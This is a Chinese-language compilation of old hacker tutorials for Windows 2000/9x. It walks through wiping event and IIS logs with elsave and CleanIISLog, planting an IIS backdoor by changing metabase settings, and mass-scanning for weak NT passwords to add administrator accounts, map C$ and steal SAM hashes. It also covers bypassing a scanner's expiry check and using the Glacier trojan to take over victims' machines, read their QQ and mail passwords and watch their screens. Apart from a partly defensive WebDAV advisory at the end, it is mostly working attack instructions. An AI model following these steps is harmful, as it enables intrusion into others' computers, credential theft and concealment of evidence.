,放上了我所收集的所有“壳”类软件。在这段时间里,各种“壳”类软件也在不段的升级换代,但都没什么太大的进展,差不多就是 TR 和众加壳软件的版本数字之争而已。

壳(下)


二.加壳软件
最常见的加壳软件ASPACK ,UPX,PEcompact
不常用的加壳软件WWPACK32;PE-PACK ;PETITE ;NEOLITE

三.侦测壳和软件所用编写语言的软件
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)使用方法:

第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行
windows起始菜单的运行,键入fi aa

第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上

2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒)





简单黑客工具使用


1.小榕的elsave清除日志的使用:

  先用ipc$管道进行连接:net use \\ip\ipc$ "password" /user:""

  清除目标系统的应用程序日志:

  elsave -s \\ip -l "application" -C

  清除目标系统的系统日志:

  elsave -s \\ip -l "system"" -C

  清除目标系统的安全日志:

  elsave -s \\ip -l "security" -C

  

  2.windows2000日志的清除:

  www的日志一般都在%winsystem%\system32\logfiles\w3svc1下面,包括www日志和ftp日志,一般先停止www服务后在删除:net stop w3svc,然后将你留下了ip的日志删除,你也可以修改日志.wwww日志在w3svc1下面,ftp日志在msftpsvc下面,每个日志都是以:exXXXXXX.log为命名的,xxxxxx代表日期.

  win2000中的其他一些日志:

  安全日志:%winsystem%\system32\config\Secevent.evt

  应用程序日志:%winsystem%\system32\config\AppEvent.evt

  系统日志:%winsystem%\system32\config\SysEvent.evt

  IIS的FTP日志:%winsystem%\system32\logfiles\msftpsvc1\,默认每天一个日志

  IIS的www日志:%winsystem%\system32\logfiles\w3svc1\ 默认每天一个日志

  Scheduler服务日志:%winsystem%\schedlgu.txt

  注册表所在项目:

  [HKLM]\system\CurrentControlSet\Services\Eventlog

  Schedluler服务注册表所在项目:

  [HKLM]\SOFTWARE\Microsoft\SchedulingAgent

  如果日志被从新定位,路径在注册表里面有记录.

  
清除日志

  清除日志必须先停掉相关的服务后才能进行:

  www和ftp日志必须想停w3svc: net stop w3svc

  然后就可在相关日志目录下面把你想要删除的日志删除.

  Scheduler服务日志必须想停止:Task Scheduler服务才能删除日志: net stop "Task Scheduler"

  系统,安全,应用程序等日志相关的服务是:Eventlog,但是该项目是无法直接停止的,我们可以先用ipc$连接过去,然后打开"控制面板"中的计算机管理中连接远程计算机,从里面删除相关的内容,但是如果日记比较多的话,可能需要比较多的时间,而且对网速要求比较高.但是,我们可以利用一个工具:小榕的elsave来删除.方法如上面第一项.

  也可以利用小榕写的一个工具:CleanIISLog来自动清除日志,用法:

  cleaniislog [logfile] [.] [cleanIP] .

  说明: 清除的日志文件,.代表所有 清除的日志中哪个IP地址的记录,.代表所有IP记录

  举例:cleaniislog . 127.0.0.1

  A.可以清除指定的的IP连接记录,保留其他IP记录。

  B.当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除。

  用法: CleanIISLog  <.>  <.>

  : 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件注意:处理所有日志文件需要很长的时间)。

  : 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录(不推荐这样做)。

  CleanIISLog只能在本地运行,而且必须具有Administrators权限。
知道对方IP入侵别人的电脑
黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。









永远的后门

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。


如果你对此有情趣,跟我来...........
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. telnet到服务器

2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Accessscript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemotescript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]
不要告诉我你不知道上面的输出是什么!!!!
现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

3. mkdir c:\inetpub\wwwroot\dir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"
这样就建好了一个虚目录:Virtual Dir1
你可以用 1 的命令看一下
5. 接下来要改变一下Virtual Dir1的属性为execute
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:
现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false


注释:cscript windows script host.

adsutil.vbs windows iis administration script

后面是 iis metabase path


这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)

大家不可以用来做非法的攻击,一切后果自负




入门者如何获得肉鸡


入门者如何获取肉鸡(跳板)

入门者如何获取肉鸡(跳板)
今天我们来讲一讲一些简单的入侵,这篇文章是送给新手的,难的文章我也写不出来~~ 这里讲的方法都是针对winnt和2000的,平台是2000。我只是想送给新手点肉鸡罢了。

罗嗦了这么多,现在我们开始吧~。首先我们来对几个扫描器评点一下什么?你不知道扫描器是什么?我晕~~~扫描器就是扫描的嘛,它可以检测出主机的漏洞!
常见的有端口扫描器,和cgi漏洞扫描器,还有就是象流光那样的大型扫描器,什么都可以扫。我们先来讲一下扫描器的原理!
现在假设你是A,要扫的是B
那么,通常建立3次握手的过程是
A--------Syn------->B
A<-----Syn/Ack------B
A-------Ack-------->B
这样就建立了连接,扫描就是建立很多这样的,从而达到了解对方开了哪些端口,哪些服务厉害的扫描器还会进一步探测!但是,这种tcp扫描会留下大量的记录,如果B的网管不是注意文明用语那么他就会开始注意你了!!
所以我们又会用半开放式扫描(syn)
也就是
A--------Syn------->B
A<-----Syn/Ack------B
A------->\\ B
A-connected--?<-----B
这样,由于B一直得不到确认,当然就不会记录ip啦,不过B若是很bt,那么他也会记录任何syn的 ip,那就没办法了!!

扫描的原理讲完了,现在来讲讲几个扫描的工具!!这才是重点,新手哪会关心

那原理啊~~~ 我们先来讲端口扫描器一个端口就是一条路,进入系统的的路!可见他的重要!!
我推荐用superscan和nscan两个都是国外的,superscan的汉化版有问题,建议去www,peckerland.com下载E文版
nscan在黑白有下! 这两个的界面简单,我就不罗嗦了!我很喜欢superscan.他的扫描准且快~~对单一端口的大规模扫描也很不错,以前大家就是用它来扫3389的!

下面我来介绍流光!!xscan!!和sss!!! 我想大家对流光应该不陌生吧!如果你是新手,先从流光开始!!界面很cool!多亏榕哥~~不过我宁可把流光作为一个攻击的工具而不是扫描的工具xscan则是安全焦点的,他可以半开放式扫描!!
而且在扫描上我觉得比流光好!因为我问过sharkstorm,他说流光会在对方主机上留下痕迹,所以我怀疑流光用的是tcp扫描! 所以我现在用大规模扫描时是用xscan而不是流光! 接下来是sss,现在的最新版是3.43,在www.peckerland.com上有3.41版和注册机.
他是由redshadow开发的,全称shadow security scanner他能扫描很多漏洞,速度也很快,留下的痕迹少,产生报告详细.有时候流光或是国内一些扫描器会误报,这时我常用他来检测.所以,在入侵单一机器时,我用的就是它!!!!
好累啊,先喝口茶~~~下面就讲怎样获得大量肉鸡! 这里我推荐用扫描nt弱口令的方法! 当然也许别人会推荐扫描sql的弱口令,但网上的nt弱口令真的比sa为空的要多太多了~~ 我们先打开流光4->扫描->简单扫描->nt/98->IP段开始扫,扫到很多139开了的主机然后ipc主机,右键->探测->远程探测用户然后就会有很多用户和共享被扫出来,其中有可能包括弱口令(参见杀手的流光教程)这里我告诉大家一个秘诀,就是有很多是guest为admin权限的,这些的密码一般为空这是因为这台主机被攻破过,有人留下了后门,这下便宜我们了,先拿来用了再说!
前面我们说过,我不喜欢用流光来扫描,所以,我们在这里用xscan来扫描nt弱口令! 在扫描选项里选nt弱口令,然后来个ip范围,让他扫,接下来就可以等待战果了一般会很丰硕,我每次扫这个都很爽!!! 接下来就要讲怎么用了!前面提到过我喜欢用流光来攻击,现在就让我们看看他的强大!! 流光4->工具->nt/iis工具->nt远程管道命令输入ip,刚才扫到的用户名,密码(若为空则不填) 连接!
ntcmd>net user
看看,连上了吧~~
我们来添加一个用户名
ntcmd>net user aaa 123 /add
命令成功完成

加到administrators组
ntcmd>net localgroup administrators aaa /add
命令成功完成

好了,这样肉鸡就做好了.什么?你想把他作成跳板? 好的,我们继续来
流光4->工具->nt/iis工具->ipc种植者
添上ip,用户名,密码等
然后点开始
接下来我们再用telnet连上去,去debug snake的sksockserver注意,用ntcmd

不能安装sksockserver。
具体我就不说了,大家自己参考说明.

当然,大家也可以放一堆后门上去.
不过我喜欢这样
ntcmd>net use g: \\ip\c$
命令成功完成

这样,我们就把他的c盘映射成了我的g盘。然后我再放个木马的server上去再用ntcmd运行,呵呵搞定~~,玩他没商量!!!
我们还可以把c;\winnt\repair\sam._抓下来,用lc3跑一下 就得到所有用户的密码,或是用木马抓密码!!
当然我们也可以telnet上去运行tlntadmn来修改telnet端口,更隐蔽怎么扩大战果呢?我们仍用ntcmd
ntcmd>net view
......
出来很多机器名,这是和我们的肉鸡共享的
比如有一台是
\\LOVE
我们就
ntcmd>ping -a LOVE
这样就得到了他的ip
我一般会用sss再扫一次
当然,你也可以用你得到的密码去试试,看能不能进去,呵呵

有一次,我"不小心"跑到某教育部门,net view一下,居然和教育局挂钩....接下来出于自身安全,我就停住了,呵呵,中国的政府不能乱搞的~~~

最后是打扫脚印,建议用小榕的cleaniislog,很方便,用法参见说明! 请记住,入侵nt的首选绝对是139,netbios

补充一点,大家在连接时可以用2000自带的计算机管理->连接到计算机这样也很方便.

关于其他几种方法,我在这里说明一下

输入法基本上绝种了~~ 不过如果你扫大量的肉鸡也许还有最好用的应该数sql的sa为空,直接用流光连就行了,连上后就可以直接添加帐号等,但是有一点不好有时候会连不上。比如我在学校机房就从来没连上过,估计是我在内部网络,有硬防火墙的原因,我在3389上就连的很好。不过总是玩这个是不会提高的!其次要说明的就是idq溢出与.printer的漏洞,这两个漏洞我不想多说什么,因为很多人都会用但成功不了,我在这里就说说什么情况下可以成功。一般来说,用xscan扫描,如果出现说isapi扩展,那么恭喜你,如果存在这两个漏洞绝对成功,我屡试不爽。因为这两个漏洞都与iis那个破东西息息相关,所以大家不要被别的扫描器的误报迷惑,在安焦的漏洞库有这两个漏洞的详细说明。

关于unicode漏洞请参见ncc写的教程

流光是一个很好的攻击工具,他的exploits文件夹和tools文件夹的东西大家漫漫体会,呵呵。不说了,不然天下大乱了!!

总之,98的安全性比2000好,因为98基本上没用 一般来说,入侵98是从139,要改自己的lmhosts文件来达到入侵的目的! 不过我劝新手不要沉迷在我讲的方法中,虽然你能从中的到很多肉鸡,但是绝对不要做简单重复的工作 当有了一定水平后要去玩linux,unix,不然水平不会提高. 我写这篇文章的目的是让大家学习,请不要破坏,若是因此引起的一切后果本人概不负责!!















流光的使用方法


窍门一:

1.很多人都有使用流光4.71之前版本的经验,不过现在请下载流光5.0内部测试版.地址:
http://www.netXeyes.com 安全焦点
http://www.swed.com.tw/xiaonu/f.rar 小奴私人下载

下载后解压安装! 解压密码在说明文件里..
(强烈建议查看readme文档再安装撒...)

安装后打上时间补丁...请把补丁放在同一个文件夹里.

2.如果没有安装时间补丁一打开流光就会出现:"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"

3.如果安装了时间补丁,你可以打开5.0.但是还是会出现"[流光5.0]已过期,请到http://www.netXeyes.com下载最新版本"...这时我们就要用到特别的方法来防止流光5.0过期了...

4.(仔细..再仔细)如果你有金山网标或者天网之类的防火墙的话...恭喜你.你就快成功了..小榕设计流光5.0内部测试版的时候会让打开主程序就会自动访问四个IP地址.
第一个是61.166.33.214 -- 云南省 楚雄市
第二个是218.30.12.185 -- 陕西省 西安市 (可能会变)
第三个是61.166.33.214 (跟第一个一样)
第四个是66.94.230.45 -- 美国(可能会变..这个很"阴险"大概在前面三个IP过后20秒左右它才出现)

防火墙首先禁止前面四个IP连接.(直接点击禁止就可以了)...

四个IP过后随便你扫什么都不会有限制.如果这时防火墙询问你是不是允许流光5.0访问**.**.**.**(ip)?? 当然点击允许啦...要不怎么扫??

4.流光5.0增强了SENSOR的扫描属性.很强大...特别是"TELNET ip 控制端口"和数据包转发功能我佩服得7体投地...自带有说明文件.大家看看就知道了.(我在这里就不废话了撒...呼呼)
_________________________________


窍门二:

还有一个比较"失败"的方法.打开补了丁的流光之前首先关闭网络连接,即不要上网.过1分钟以后再打开网络连接...这时你就可以无忧用5.0了..(这样做是防止一开流光5.0就访问指定IP)
_________________________________

窍门三:

听"新丁"(我在黑基的兄弟)说更改流光的图标也可以防止过期提示,我没试过.大家试试..
_________________________________

TNND...酒气冲头.难受死了...坚持搞完..
_________________________________

友情提醒:

1.如果你是天网防火墙请把"属性设置"--"自动允许每个程序运行并记录日志"(好像是这样吧)的勾去掉...这样就可以拦截流光运行时访问的IP地址了..

2.流光5.0由于是内部测试版本,所以不限制国内IP扫描.请千万不要!不要!!不要!!!扫国内IP!尽量多种植SENSOR到你的外国肉鸡上帮你扫撒....(呼呼,我最喜欢做的事)

3.流光5.0太强大.扫描的IP段尽可能少点...这个版本中包含了工具ARP Netwok Sniffer,这是一个基于ARP SPOOF的工具,有可能会造成目标网络出现故障甚至于中断,在使用的时候不要指定过于大的IP范围。推荐不要超过32台主机。--- 引用

不要把自己的机子都搞死了!同时尽量不要使用"网络嗅探"功能. "要知道在一个100M的环境中的流量是非常大的,所以请首先确定您自己的主机是否有足够的带宽接收传输数据" --- 引用!

___________________________________

某些醉话...

1.很多人扫描的时候会扫到用户:root:空 admin:同 administrator:同 wwwadmin:同 等同时存在于一个IP的现象.但是建立IPC连接的时候却失败.

注意:这些是虚报...请你点击"选项(o)"---"IPC用户列表选项(I)"----把"如果主机不允许列出用户则强制从以下文件导入"的选项去掉...这样你扫描出来的用户就不会虚报了...

2.扫描的时候要注意时间...要想到国外的时间跟我们有差异...如果你特别喜欢在我们的下午4点扫美国的IP段...那我没话可说!

3.不要扫描自己不会利用的漏洞和端口...反正自己不会用,扫又浪费时间...(如果你打算学习怎么利用...那鼓励你扫!)

4.流光的综合性很强!注意看每一项选项内容,自己摸索更好的综合扫描办法,....

玩木马


如果你是高手,看了这篇文章你会觉得无聊,如果你是菜鸟(和我一样菜的话)或者会有点用。哪个人不爱玩?给我站出来!我要狠狠的KKKKK他一顿。5555.........好了,闲话少说为好,转入正题吧。首先我用到的工具主要是两个,1.扫描工具:代理猎手,2.冰河2.2客户端。(哪里有下载?自己找吧)下面分两步走:
一.扫描篇:
双击桌面上的代理猎手快捷图标,进入代理猎手主操作台.点击左上角三角形下面的“搜索任务”,点击下面的“添加任务”,进入“添加搜索任务”窗口,任务类型选“搜索网址范围”,按“下一步”,进入地址范围窗口,接着按右边的“添加”,在弹出的窗口中,地址范围类型选“起止地址范围”,起止地址填上你要扫描的IP段(例如61.150.0.0)结束地址填上例如(61.150.255.255),按“确定”,见到我刚才填的IP段出现在窗口中。接着按“下一步”,进入端口和协议窗口,按右边的“添加”,在弹出的小窗口中选“单一端口”,下面数字框中填上冰河的默认端口7626协议选“HTTP”,在旁边的“必搜”前打上钩。按“确定”,就看到了我刚才填的端口和协议出现在窗口中,按“完成”,这时回到添加前的窗口。看到框框中已有了我刚才填的内容 ,左上角的三角形也由开始的灰色变了现在的蓝色,这时按下这个三角形就开始了我的第一次搜索任务(这时操作台下面的数字会不停的跳动,表示正搜索中),这时按下红色停止按钮下面的“搜索结果”按钮,就看到了搜索的结果,如果有端口7626开的机器扫到,就会在窗口中显示该机的IP地址,(验证超时那些先不要理它,反正它的端口7626是打开了),如果你选IP段好运的话,很快就会有机器被你扫描到!你不仿等到扫描到的机器有多几个时才停止扫描,这样你进别人的机器跳舞的机会就大大提高了!如果你真的那么倒霉扫不到的话,就换IP段来搜吧.不过要记住把先前的搜索任务删除掉再添加新的搜这里有一点要告诉你,代理猎手的其他设置你先不要搞(其余都是默认的),就按我上面提到的做就行了!好了,扫描到了一大堆的IP了,GO GO GO 进入主要的一步了。。。。。

二。连接篇:
运行冰河2.2客户端,进入操作台,点击左上角"添加主机"按钮,在弹出的窗口中,显示名称处填上我刚才扫描到的IP,密码先不填,端口填默认的7626.按"确定",这时看到了填入的IP出现在主操作台左边的窗口中了.重复上面的这一步,把扫描到的IP全部都填进去(省去了等一下连接一个填一次的麻烦),看到了所有的IP都填进去后,就开始了我们的第一次入侵(这里有一点要提醒一下的是,你在连接前一定要把你的防火墙和病毒监控关了).好了,双击操作台左边看到的IP,下面的状态条会滚动,等待一下,看看返回来什么信息.如果是"主机没有响应"或者"无法与主机连接",试多几次,还是一样的话,可能对方已离线或打开7626端口的不是冰河的服务端,就选下一个IP.好了,这个能连接,但返回的信息是"口令有误..."那这个我可以搞店了,先试冰河的通用密码,具体操作如下:右键点击该IP,在弹出菜单中选"修改",进入刚才添加IP的窗口,在"访问口令"处填上你所选的通用密码,按"确定".再到主操作台上"当前连接"的下拉菜单中找到你刚才修改了口令的IP,点击一下,看到"访问口令"处出现了多个"*******"号,这就是你填上的冰河通用密码了,再按一下旁边的"应用",再双击操作台左边该IP,就尝试再次连接,当看到"正在接收数据""完成"等字样时,呵呵,你已成功了.这部机你有了一切的操纵权了.看到了他的机器的分盘(C.D.E.F.G.等)在右边的屏幕中出现了,双击这个小图标,你就可以看到他的硬盘中的文件夹列表和文件,再通过用鼠标右键点击文件夹或文件,你就可以使用"复制","粘贴",删除","下载"等等功能了,你也可以上传一个文件给他远程打开,呵呵.如果你上传的是另一个木马,那他的机就又多中了一个马儿了..具体做什么自己想吧.去看看他在干什么吧,点击操作台上方"查看屏幕"按钮,图象格式处选"JPEG",(因为JPEG图象传输速度比BMP的传输速度要快),按确定,等一下一个小的屏幕就出来啦,这个就是对方的屏幕画面了,右键点击该小屏幕,在"自动跟踪"和"自动缩放"前打上钩,那么这个小屏幕就会跟随对方的屏幕变化而变化了.再去点击"命令控制台",看到各个命令类按钮,双击各个按钮会有不同的命令出了,你可以在"口令类命令"下的"历史口令"处查看他的QQ密码,上网密码等等,在"设置类命令"下的"服务器配置"中读取该冰河服务端的配置信息,也就是刚才阻档你连接的设置了的密码,要是对方有设置IP邮寄的话你也可以看到他的信箱号,用这个密码你或许能破了他的信箱(我用这个方法也真的破了好几个人的信箱哦,呵呵),你也可以修改了他的配置,换了你自己的密码和邮寄信箱.你也可以帮他的硬盘创建共享.以后他把冰河杀了你也可以用共享连接他啊!(等于给自己多留了个后门)其他功能就不说了,你自己慢慢去尝试吧!
还有一种情况,就是你尝试了所有的通用密码都不能连接的话,就试试小飞刀原创的冰河漏洞吧,具体操作如下:当你用完了通用密码后还是显示"密码有误......",就去点击操作台窗口中的"我的电脑",在你的文件中找到你的冰河服务端,右键点选"远程打开",这时你依然看到是"密码有误....",但马上又多了一条传输进度条出来,显示正在传送文件,当看到了进度条完成后,下面的提示也变了,会显示"文件传送完毕"和"文件打开成功".这样你就可以不用密码连接进去了.(记住要先把你刚才填进去的密码删了,按"应用".当返回的信息是"文件传送完毕"和"文件打开失败"时,你可以上传其他的木马服务端(例如黑洞,公牛等等木马都可以)上去,这样也可以控制对方,但已不是用冰河客户端了,而是换了相对应的木马客户端.
咳咳........进去后可别干坏事哦!

其实玩了这么多的木马还是觉得冰河是再好用的(呵呵.这只是个人观点,你有好用的木马就告诉我一声吧),功能多多,易用,而且中冰河的机器也是再多的.其他功能就不一一说了..(呵呵呵.水平有限,看了可别笑掉牙,我可没钱给你补牙











溢出专集


2003年3月18日,微软发布MS03-007号安全公告:Microsoft IIS 5.0 WebDAV远程溢出漏洞,声称利用此漏洞溢出后可以得到localsystem权限,于是网上沸沸扬扬开始关注起此漏洞。到了3月下旬,发现此漏洞的老外发布了他的exploit,不过由于这个exploit是针对英文版的win2000的,所以对国内造成的影响不大。直至3月27日,国内某黑客在安全焦点上公布了其修改后的针对中文版win2000的此漏洞的exploit程序,于是第二天即3月28日,国内的各个黑客网站都纷纷提供了编译好的win平台下的WebDAV漏洞溢出攻击程序的下载,各个安全论坛便随处可见关于WebDAV远程溢出攻击的讨论,甚至更有甚者把溢出攻击过程做成了动画教程供人观摩,WebDAV漏洞溢出攻击在一夜之间"迅速走红"。而且,其攻击代码在3月29日时又被人改进,使其成功率又大幅提高,眼下WebDAV远程溢出攻击已经成为各种黑客最流行的攻击方法,其来势之迅速之猛烈是以前Unicode、printer等漏洞所不及,而且有被蠕虫制造者利用的可能,所以笔者认为有必要写此文章让广大网管和用户尽早了解这个漏洞情况及解决方案,以提高警惕、做好防范。
一、 漏洞基本情况
1、 漏洞名称及描述
名称:Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告:MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述:IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击,可能以Web进程权限在系统上执行任意指令。
2、 受影响系统



Microsoft IIS 5.0
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP3
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP2
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP1
- Microsoft Windows 2000 Professional/Server/
Datacenter Server



3、 什么是WebDAV组件
Microsoft IIS 5.0 (Internet Information Server 5)是Microsoft Windows 2000自带的一个网络
信息服务器,其中包含HTTP服务功能。IIS5默认提供了对WebDAV的支持,WebDAV(基于Web的分布式写作和改写)是一组对HTTP协议的扩展,它允许用户协作地编辑和管理远程Web服务器上的文件。使用WebDAV,可以通过HTTP向用户提供远程文件存储的服务,包括创建、移动、复制及删除远程服务器上的文件,但是作为普通的HTTP服务器,这个功能不是必需的。
4、 漏洞产生的原因
这个漏洞产生的原因具体是由于WebDAV使用了ntdll.dll中的一些API函数,而这些函数存在一个缓
冲区溢出漏洞,而Microsoft IIS 5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查,远程入侵者可以通过向WebDAV提交一个精心构造的超长的数据请求而导致发生缓冲区溢出,成功利用这个漏洞可以获得LocalSystem权限,这意味着入侵者可以获得主机的安全控制能力。所以确切地说,这个漏洞并不是IIS造成的,而是ntdll.dll里面的一个API函数造成的。也就是说,很多调用这个API的应用程序都存在这个漏洞。
5、 测试代码:见附件
WebDAV远程缓冲区溢出漏洞的基本情况我们这里介绍到这里了,如果读者有兴趣想进一步了解这个漏
洞具体的溢出原理分析,建议可以去安全焦http://www.xfocus.net/中参阅isno写的两篇关于WebDAV远程溢出漏洞分析的文章,很精彩!我这里就不班门弄斧了。
二、如何检测漏洞
在上面介绍漏洞基本情况的时候,我们已经说了IIS 5.0的默认配置是提供了对WebDAV的支持,也就是说,如果你的win 2000提供了IIS服务而没有打过针对此漏洞的补丁,那么一般情况下你的IIS就会存在这个漏洞,但如何来确定呢?我们可以借助一些工具来帮我们进行检测。
1、 第一个检测工具:Ptwebdav.exe
下载地址http://www.ttian.net/txt/show.php?id=10
简介:Ptwebdav.exe是一个老外写的专门用来远程检测Windows 2000 IIS 5.0服务器是否存在WebDAV
远程缓冲区溢出漏洞的东东,其操作界面非常简单,只要在其"IP or hostname"中填入要检测的主机和IIS服务端口,然后按"check"就可以了。笔者正用它来检测本地主机是否存在WebDAV漏洞,一会儿它就会在下面窗口里显示结果。这个工具不错,但它每次只能检测一台机子,如果你想检测一个网段内所有主机就比较麻烦了,一台台地检测不知道要检测到什么时候。让我们来看看第二个检测软件,它能帮我们解决这个问题。
2、 第二个检测工具:WebDAVScan v1.0
下载地址http://www.cnhonker.net/Down/show.php?id=65&;;down=1
简介:WebDAVScan是一个专门用于检测网段内的Microsoft IIS 5.0服务器是否提供了对WebDAV的
支持的扫描器,软件非常小,只有7.23KB,而且是个绿色软件,无须安装,直接运行即可!扫描后如有此安全漏洞,软件会自动生成扫描报告,原来也是老外写的,不过我们这里用的是WebDAVScan的汉化版。笔者扫描X.X.23.1-X.X.23.254的网段大概用了30秒时间,速度很快,窗口右边显示的是结果,"Enable"表示了此IIS支持WebDAV,至于有没有漏洞要看它有没有打过补丁了。经笔者测试,这个软件确实很不错,推荐大家使用,好了,WebDAV的检测也介绍完了,下面我们开始讲利用此漏洞测试攻击了。
二、 漏洞测试攻击
自从WebDAV的exploit代码出现后,网上紧接着就出现了好几种版本的溢出攻击程序,虽然其核心
代码类似,但具体的功能和操作还是有些区别的,我们这里来了解两个WebDAV的溢出攻击程序。
1、 第一个溢出程序:wb.exe
下载地址http://www.longker.com/txt/opensoft.asp?soft_id=131&;;url=1
